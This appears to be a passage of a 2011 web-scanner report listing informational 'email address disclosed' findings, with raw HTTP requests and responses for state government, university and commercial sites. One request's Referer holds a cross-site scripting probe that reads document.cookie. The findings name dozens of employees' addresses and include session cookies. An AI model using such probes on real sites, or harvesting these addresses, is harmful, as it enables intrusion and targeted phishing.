....ftypf4v ....isommp42m4v ...umoov...lmvhd.....$...$...._..P. ................................................@..................................Ztrak...\tkhd.....$...$...........P. ................
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...
<Iptc4xmpCore:CreatorContactInfo
Iptc4xmpCore:CiEmailWork="patrick@patricksmithphotography.com"
Iptc4xmpCore:CiUrlWork="www.patricksmithphotography.com"/>
...[SNIP]...

22.20. http://cache.pack.google.com/edgedl/chrome/install/696.60_648.205/chrome_updater.exe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.pack.google.com
Path:   /edgedl/chrome/install/696.60_648.205/chrome_updater.exe

Issue detail

The following email address was disclosed in the response:

Request

GET /edgedl/chrome/install/696.60_648.205/chrome_updater.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 28 Apr 2011 18:40:00 GMT
Range: bytes=529250-1333052
User-Agent: Microsoft BITS/7.5
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Proxy-Connection: Keep-Alive
Host: cache.pack.google.com

Response

HTTP/1.1 206 Partial Content
Accept-Ranges: bytes
Content-Length: 803803
Content-Type: application/x-msdos-program
ETag: 20b78
Vary: *
Date: Thu, 28 Apr 2011 18:55:23 GMT
Server: downloads
X-XSS-Protection: 1; mode=block
Last-Modified: Thu, 28 Apr 2011 18:40:00 GMT
Content-Range: bytes 529250-1333052/4243000
Connection: close
X-Content-Type-Options: nosniff

.%.Y ...U......)..4O.Nz.#.&....9..M..........t.....Fkb..U....!.;......R..;z<...[s....Vfk8A.:.......$.-...(\.....,...1H.Vr..](.M.....o.e...>..an.a.!...?......0.Y....+....,.m.Za...K.Z.d.W...iLJE.J.L;.!
...[SNIP]...
<\[>.
. .ci.C@6i.Kr....Z.Y.....[U.._.X.....[R..w!A....#.. ....B.....b.$...j...O..
....p.C...K.`!.%2..~.V......lF.BB:n..(B.*5..{1SD..lL......|.3....AD....%L...};w...#l.....\3.....BA.j.....e.i...|3`V&.q*8.Y......@]{...a..
...[SNIP]...

22.21. http://cdnb1.kodakgallery.com/A/consolidatedFiles/common_consolidated.min.v-2028399759.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnb1.kodakgallery.com
Path:   /A/consolidatedFiles/common_consolidated.min.v-2028399759.js

Issue detail

The following email address was disclosed in the response:

Request

GET /A/consolidatedFiles/common_consolidated.min.v-2028399759.js HTTP/1.1
Host: cdnb1.kodakgallery.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0BA11A045581BD2C37F3ADAC84642E3F.ecom202_main; sourceId=700019816903; DYN_EMAIL=anon_mem1215451620@kodakgallery.com; bookStartTest1=control; bookUnlockedLayoutTest=lockedLayout; ft_80002=none; abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Type: application/javascript
Date: Sat, 30 Apr 2011 15:08:15 GMT
Expires: Sun, 29 Apr 2012 15:08:15 GMT
Last-Modified: Thu, 28 Apr 2011 04:38:00 GMT
Server: ECAcc (dca/5376)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 312068

var MooTools={version:"1.2.4",build:"0d9113241a90b9cd5643b926795852a2026710d4"};var Native=function(k){k=k||{};var a=k.name;var i=k.legacy;var b=k.protect;var c=k.implement;var h=k.generics;var f=k.in
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...

22.22. http://cityofmuscleshoals.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cityofmuscleshoals.com
Path:   /Default.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /Default.asp HTTP/1.1
Host: cityofmuscleshoals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:19:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
Content-Length: 12767
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQBRQBTR=FMMIMMOBDHDHEIKEOFLEMEMB; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base href="http://cityofmuscleshoals.com/Sites/Muscle_Shoals/" />
<title>Muscle Shoals, Alabama | Main-Homepage</title
...[SNIP]...
<a class="footertext" href="mailto:mshoals@hiwaay.net">mshoals@hiwaay.net</a>
...[SNIP]...

22.23. http://climate.rutgers.edu/njwxnet/station.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://climate.rutgers.edu
Path:   /njwxnet/station.php

Issue detail

The following email address was disclosed in the response:

Request

GET /njwxnet/station.php HTTP/1.1
Host: climate.rutgers.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20252


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>Cream Ridge, NJ - Forecast, Radar and Current Weather - NJWxnet</title>
   <link rel="st
...[SNIP]...
<a href="mailto:support@climate.rutgers.edu">
...[SNIP]...

22.24. http://courts.delaware.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://courts.delaware.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: courts.delaware.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:34:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 42174
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:Patricia.DiIenno@state.de.us">
...[SNIP]...

22.25. http://data.osbm.state.nc.us/pls/pbis/dyn_hr_staffweb.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_hr_staffweb.show

Issue detail

The following email addresses were disclosed in the response:

Request

GET /pls/pbis/dyn_hr_staffweb.show HTTP/1.1
Host: data.osbm.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 56000
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 56000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<a href="mailto:andy.willis@osbm.nc.gov">andy.willis@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:debbie.young@osbm.nc.gov">debbie.young@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:arnetha.dickerson@osbm.nc.gov">arnetha.dickerson@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:dashone.knight@osbm.nc.gov">dashone.knight@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:bill.stockard@osbm.nc.gov">bill.stockard@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:tonya.austin@osbm.nc.gov">tonya.austin@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:shelia.stewart@osbm.nc.gov">shelia.stewart@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:david.brown@osbm.nc.gov">david.brown@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:kela.lockamy@osbm.nc.gov">kela.lockamy@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:elizabeth.grovenstein@osbm.nc.gov">elizabeth.grovenstein@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:bryan.conrad@osbm.nc.gov">bryan.conrad@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:susie.esealuka@osbm.nc.gov">susie.esealuka@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:christopher.jones@osbm.nc.gov">christopher.jones@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:pam.leaman@osbm.nc.gov">pam.leaman@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:joyce.wallace@osbm.nc.gov">joyce.wallace@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:pam.kilpatrick@osbm.nc.gov">pam.kilpatrick@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:deborah.landry@osbm.nc.gov">deborah.landry@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:pat.taylor@osbm.nc.gov">pat.taylor@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:joe.white@osbm.nc.gov">joe.white@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:wayne.williams@osbm.nc.gov">wayne.williams@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:jennifer.hoffmann@osbm.nc.gov">jennifer.hoffmann@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:mercidee.benton@osbm.nc.gov">mercidee.benton@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:donna.cox@osbm.nc.gov">donna.cox@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:kristen.crosson@osbm.nc.gov">kristen.crosson@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:greg.piner@osbm.nc.gov">greg.piner@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:jennifer.wimmer@osbm.nc.gov">jennifer.wimmer@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:melvin.lee@osbm.nc.gov">melvin.lee@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:barbara.bowers@osbm.nc.gov">barbara.bowers@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:aaron.gallagher@osbm.nc.gov">aaron.gallagher@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:alicia.james@osbm.nc.gov">alicia.james@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:cheryl.reed@osbm.nc.gov">cheryl.reed@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:jonathan.womer@osbm.nc.gov">jonathan.womer@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:nathan.knuffman@osbm.nc.gov">nathan.knuffman@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:angela.y.griffin@osbm.nc.gov">angela.y.griffin@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:anca.grozav@osbm.nc.gov">anca.grozav@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:warren.plonk@osbm.nc.gov">warren.plonk@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:jennifer.song@osbm.nc.gov">jennifer.song@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:barbara.baldwin@osbm.nc.gov">barbara.baldwin@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:jenny.addison@osbm.nc.gov">jenny.addison@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:jeani.allen@osbm.nc.gov">jeani.allen@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:edie.chung@osbm.nc.gov">edie.chung@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:donald.crooke@osbm.nc.gov">donald.crooke@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:chantee.favors@osbm.nc.gov">chantee.favors@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:betty.haley@osbm.nc.gov">betty.haley@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:regina.hill@osbm.nc.gov">regina.hill@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:john.leskovec@osbm.nc.gov">john.leskovec@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:amelita.mapagu@osbm.nc.gov">amelita.mapagu@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:walter.mcmiller@osbm.nc.gov">walter.mcmiller@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:courtney.michelle@osbm.nc.gov">courtney.michelle@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:ron.sellers@osbm.nc.gov">ron.sellers@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:michele.sykes@osbm.nc.gov">michele.sykes@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:joe.turlington@osbm.nc.gov">joe.turlington@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:erin.matteson@osbm.nc.gov">erin.matteson@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:bob.coats@osbm.nc.gov">bob.coats@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:brandon.james@osbm.nc.gov">brandon.james@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:trevor.minor@osbm.nc.gov">trevor.minor@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:sarah.porper@osbm.nc.gov">sarah.porper@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:caitlin.winwood@osbm.nc.gov">caitlin.winwood@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov">joel.sigmon@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:andy.whalen@osbm.nc.gov">andy.whalen@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:wayne.crews@osbm.nc.gov">wayne.crews@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:agness.gunter@osbm.nc.gov">agness.gunter@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:paula.a.jones@osbm.nc.gov">paula.a.jones@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:karthik.kooturu@osbm.nc.gov">karthik.kooturu@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:ernest.pecounis@osbm.nc.gov">ernest.pecounis@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:lucy.ringland@osbm.nc.gov">lucy.ringland@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:krishnan.viswanathan@osbm.nc.gov">krishnan.viswanathan@osbm.nc.gov</a>
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov" title="Email" />
...[SNIP]...

22.26. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_osbmweb_libdatalinks.show

Issue detail

The following email addresses were disclosed in the response:

Request

GET /pls/pbis/dyn_osbmweb_libdatalinks.show?p_arg_names=context&p_arg_values=facts HTTP/1.1
Host: data.osbm.state.nc.us
Proxy-Connection: keep-alive
Referer: http://www.osbm.state.nc.us/ncosbm/facts_and_figures/socioeconomic_data/census_home.shtm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:48:37 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 45766
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 45766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<a href=http://smpbff2.dsd.census.gov/TheDataWeb_HotReport/servlet/HotReportEngineServlet?reportid=69e0bef98ff0710dd175f5eb21bf9491&emailname=whazard@census.gov&filename=ed_home.hrml>
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov" title="Email" />
...[SNIP]...

22.27. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libevents.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_osbmweb_libevents.show

Issue detail

The following email address was disclosed in the response:

Request

GET /pls/pbis/dyn_osbmweb_libevents.show HTTP/1.1
Host: data.osbm.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:54 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 31677
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 31677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov" title="Email" />
...[SNIP]...

22.28. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libforms.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_osbmweb_libforms.show

Issue detail

The following email address was disclosed in the response:

Request

GET /pls/pbis/dyn_osbmweb_libforms.show HTTP/1.1
Host: data.osbm.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:54 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 54241
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 54241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov" title="Email" />
...[SNIP]...

22.29. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libmemos.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_osbmweb_libmemos.show

Issue detail

The following email address was disclosed in the response:

Request

GET /pls/pbis/dyn_osbmweb_libmemos.show HTTP/1.1
Host: data.osbm.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:57 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 146394
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 146394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov" title="Email" />
...[SNIP]...

22.30. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libnews.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_osbmweb_libnews.show

Issue detail

The following email address was disclosed in the response:

Request

GET /pls/pbis/dyn_osbmweb_libnews.show HTTP/1.1
Host: data.osbm.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:58 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 33363
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 33363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov" title="Email" />
...[SNIP]...

22.31. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libother_one.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_osbmweb_libother_one.show

Issue detail

The following email addresses were disclosed in the response:

Request

GET /pls/pbis/dyn_osbmweb_libother_one.show HTTP/1.1
Host: data.osbm.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:59 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 37315
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 37315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<a href=http://smpbff2.dsd.census.gov/TheDataWeb_HotReport/servlet/HotReportEngineServlet?reportid=69e0bef98ff0710dd175f5eb21bf9491&emailname=whazard@census.gov&filename=ed_home.hrml>
...[SNIP]...
<a href=http://smpbff2.dsd.census.gov/TheDataWeb_HotReport/servlet/HotReportEngineServlet?reportid=69e0bef98ff0710dd175f5eb21bf9491&emailname=whazard@census.gov&filename=ed_home.hrml>
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov" title="Email" />
...[SNIP]...

22.32. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libpubs.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_osbmweb_libpubs.show

Issue detail

The following email address was disclosed in the response:

Request

GET /pls/pbis/dyn_osbmweb_libpubs.show HTTP/1.1
Host: data.osbm.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:00 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 126488
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 126488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov" title="Email" />
...[SNIP]...

22.33. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libtopicgroups.show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.osbm.state.nc.us
Path:   /pls/pbis/dyn_osbmweb_libtopicgroups.show

Issue detail

The following email address was disclosed in the response:

Request

GET /pls/pbis/dyn_osbmweb_libtopicgroups.show HTTP/1.1
Host: data.osbm.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:01 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 21491
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 21491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>North Carolina | Off
...[SNIP]...
<a href="mailto:joel.sigmon@osbm.nc.gov" title="Email" />
...[SNIP]...

22.34. https://dhr.ky.gov/DHRWeb/RS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dhr.ky.gov
Path:   /DHRWeb/RS

Issue detail

The following email address was disclosed in the response:

Request

GET /DHRWeb/RS HTTP/1.1
Host: dhr.ky.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Document follows
Server: IBM HTTP Server/V5R3M0
Connection: close
Accept-Ranges: bytes
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 10123
Last-Modified: Sat, 30 Apr 2011 12:20:07 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Language: en-US
Set-Cookie: JSESSIONID=0000nPEe3iyv3vDZg8IytDP4Wxw:C5A1D6DE31FD990B000007D400000F8A00000000; Path=/
Date: Sat, 30 Apr 2011 12:20:08 GMT
Server: WebSphere Application Server/7.0
Cache-Control: no-cache="set-cookie, set-cookie2"


